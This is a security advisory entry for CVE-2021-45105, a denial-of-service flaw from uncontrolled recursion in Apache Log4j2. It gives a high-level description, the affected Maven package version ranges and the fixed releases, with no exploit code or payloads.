GHSA-p6xc-xr62-6r2gHighCVSS 8.6

Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion

Published
December 18, 2021
Last Modified
June 9, 2026

🔗 CVE IDs covered (1)

CVE-2021-45105

📋 Description

Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0 and 2.12.3.

Affected packages

Only the org.apache.logging.log4j:log4j-core package is directly affected by this vulnerability. The org.apache.logging.log4j:log4j-api should be kept at the same version as the org.apache.logging.log4j:log4j-core package to ensure compatability if in use.

🎯 Affected products7

  • maven/org.apache.logging.log4j:log4j-core:>= 2.4.0, < 2.12.3
  • maven/org.apache.logging.log4j:log4j-core:>= 2.13.0, < 2.17.0
  • maven/org.apache.logging.log4j:log4j-core:< 2.3.1
  • maven/org.ops4j.pax.logging:pax-logging-log4j2:>= 1.8.0, < 1.9.2
  • maven/org.ops4j.pax.logging:pax-logging-log4j2:>= 1.10.0, < 1.10.9
  • maven/org.ops4j.pax.logging:pax-logging-log4j2:>= 1.11.0, < 1.11.12
  • maven/org.ops4j.pax.logging:pax-logging-log4j2:>= 2.0.0, < 2.0.13

🔗 References (19)